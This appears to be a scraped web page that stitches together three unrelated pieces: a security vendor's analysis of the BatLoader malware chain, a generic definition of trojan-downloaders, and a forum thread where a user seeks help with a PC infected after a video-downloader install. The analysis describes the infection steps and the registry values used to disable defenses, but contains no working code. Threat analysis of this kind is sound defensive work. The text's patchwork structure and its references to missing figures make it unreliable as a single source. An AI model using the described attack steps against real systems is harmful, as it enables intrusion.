Video Downloader Pro Malware
Denisha Cerniglia
VMware Carbon Black Managed Detection and Response (MDR) analysts are constantly handling security incidents within our customer environments and tracking emerging and persistent malware campaigns. One such threat that has been particularly prevalent over the last couple of months is BatLoader. Named by Mandiant [1], BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. The threat actors utilize search engine optimization (SEO) poisoning to lure users to download the malware from compromised websites. The use of living-off-the-land binaries makes this campaign hard to detect and block especially early on in the attack chain.
While researching the pre-existing information on BatLoader published on the public internet, there seemed to be some confusion as to whether BatLoader and Zloader, a banking trojan, are one and the same. For example, looking up this file on VirusTotal we see that different antivirus engines group it in the Zloader malware family. The same file has been referenced in community-contributed IOC collections for both Zloader and Batloader.
In many ways, Batloader draws familiarity from the previously known ZLoader. Our team analyzed the initial steps of compromise utilizing the two malware samples presented in the chart below to provide an accurate comparison.
Where these two malware types draw substantial similarities is through their use of SEO poisoning, leveraging Windows Installer, and their use of the native OS binaries during the attack delivery process.
Note: Batloader continues to evolve and we have seen different execution steps from different samples. Although the core functionality remains the same, the malware operators use different scripts (both in name and content) possibly to make detection more difficult. For simplicity, we only analyzed one of the three variations we encountered. The IOC section below lists scripts and tools used in all the different attack chains.
The PowerShell inline script kicks off the infection when executed during software installation, downloading the first BatLoader script, update.bat using the cmdlet Invoke-WebRequest as shown in Figure 6.
The PowerShell script scripttodo.ps1 runs some discovery commands as well as downloading and installing a copy of Gpg4win (an email and file encryption package) and Nsudo.exe, a tool used to launch programs with elevated privileges.
Nsudo is used to impair defenses by adding the registry values ConsentPromptBehaviorAdmin ,Notification_Suppress, DisableTaskMgr, DisableCMD and DisableRegistryTools. These configurations restrict user access on the infected device making remediation difficult.
The final payloads dropped after infection often include two executables (e.g. d2ef5.exe, p9d2s.exe) and a DLL file (e.g. f827.dll, d655.dll). Within each of the infections we observed, one of the executable files was a known bad attributed to the Ursnif/Gozi malware family, a banking trojan. The other appeared to be Arkei/Vidar infostealer. Once these executables are set to run, the main dll is also executed. In some incidents, we were able to confirm that the dll was a Cobalt Strike stager.
New threats are constantly emerging. At VMware Carbon Black we work around the clock to ensure that our products keep our customers safe from those very threats and offer MDR, the last wall of defense, to fill the gap between the known, evolving and unknown threats.
Batloader is a great example of the benefit of our MDR product. As our team has detailed, this malware variant is much stealthier and embeds itself quite thoroughly within the impacted host device. The Carbon Black sensor is able to detect specific behaviors of the malware and generate alerts for further analysis. The alerts in themselves did not paint a holistic picture of the attack. This would be a challenge for any team that does not have the resources to conduct an in depth threat hunt such as those provided by MDR.
The Endpoint Standard product receives updates for known malicious hashes and blocks all types of Known or Suspect malware files from executing through behavioral analysis. While the initial payload may be able to circumvent detection, it is highly likely that when the malware runs it will trigger other alerts that are indicators of a more complex attack, such as the ones highlighted below.
MDR Threat Analysts detected this change in tactics and initiated the investigation that has brought us to this point of highlighting the nuances and vital differences between Batloader and Zloader and how it could impact our customer environments. The discovered IOCs related to this malicious behavior is documented to ease the next steps for our customers with Threat Analysts always available for follow-up questions and support.
Observed as early as July of 2022, this malware has already become commonplace as a threat against Carbon Black MDR customers. The following diagram illustrates its prevalence across different sectors, with business and financial services being prime targets. Since it was first observed by the VMware Carbon Black team there have been at least three waves of infection to date with more to be expected.
This proves once again that as the threat landscape continues to change, the security industry as a whole needs the tools, knowledge, and collaboration to be able to detect and block the latest discovered techniques. Here at VMware Carbon Black, the MDR team and TAU heavily rely on communication and collaboration to ensure that our products are able to stand against these threats as they continue to evolve in a timely manner. Our teams measure our success through our ability to adapt and persevere on this ever-changing battlefield.
A False Positive is when a file is incorrectly detected as harmful, usually because its code or behavior resembles known harmful programs. A False Positive will usually be fixed in a subsequent database update without any action needed on your part. If you wish, you may also:
A trojan-downloader is a type of trojan that installs itself to the system and waits until an Internet connection becomes available to connect to a remote server or website in order to download additional programs (usually malware) onto the infected computer.
Trojan-downloaders are also commonly distributed as disguised file attached to spam emails. The attached programs are typically labelled using legitimate-sounding program or document names, such as 'invoice' or 'accounts.exe', as a simple form of social engineering. If the file attachment is opened, the trojan-downloader is installed.
Once a trojan-downloader has been installed on a machine, it will try to contact to a remove server or website, where it can either directly fetch additional files for download, or find further instructions from the attackers on where to find the files.
A couple of days ago i downloaded YTD video downloader and after that my computer started to act strange. At first it froze and i had to reboot manually. During boot it froze again and I had to turn it off manually once again. It diagnosed my computer and I had to restore. After the restore I were able to log on and use the computer for a few minutes until it froze again and i had to reboot manually once more. Every time i try to turn off the computer it freezes, and after that i have to restore as the first boot after a freeze never works.
Atleast it works decently now, it doesn't freeze at the desktop after a few minutes and i can use some programs, but it is very very slow. And i detected that my antivirus program and firewall is inactive and unable to start up. I've tried using AdwCleaner and it found 21 infected files, but as it forces me to reboot to remove the infected files it keeps freezing and after that it get stuck at boot, which leads to another manual reboot and another restore. I'm pretty much stuck in a loop as I'm unable to properly turn off the computer.
I will be guiding you as we go forward. I do need to see other diagnostic information from this system, so that I can see about pinning down the source of this issue.
I would like to ask that you always attach any report or file I ask for, from time to time.
Some initial remarks.
All the freezups on shutdown or on starting up, or in running the system are obviously not good to have. But having a good solid Operating System is a must-have, otherwise what one may try may be for nought.
I need to know the version of Windows on this machine. If you have a Windows operating system DVD. If you had a backup of this system from before.
Also the name of the brand of antivirus.
Please let me know the Brand-name of antivirus on this machine. Is it McAfee, TrendMicro, Norton / Symantec, Security Essentials, Avast, BitDefender, Kaspersky, or some other brand, which one exactly?
I have windows 10, my computer keeps freezing and force me to manualy restart it, everytime i restart the comupter it automatically restores (to a previous point when it worked well, i guess). But its the same issue when im enter windows afterwards.
I started tonight to download and install the first link you gave me i was pretty sure that the computer will restart itself afterwards. So i took some pictures so you know what happen. Its always the same. This is what happen:
First picture, Automatic Repair, shows everytime i start my comupter. Exacly the same happens if i press restore or cancel. So this time i pushed restore. The computer starts restoring and this take approximatley 10-15 minutes.
So, after 10-15 minutes of restoring i enter windows and it takes another 5 minutes before i can click on anything, just loading. when i finally can, i run the link (2nd picture) and it starts loading for about 2-3 minutes and my screen turns black and it restarts itself (3rd picture) HP logo turns up and the five small dots in 4th picture runs for 15 seconds and freeze.
Acctually, when this first happen, like 2 weeks ago, my computer started windows update and failed it because of this issue above.
I notice that both my firewall and antivirus was disabled and has been since this first appeard. If I try to start the firewall, you know what happens, it freezes.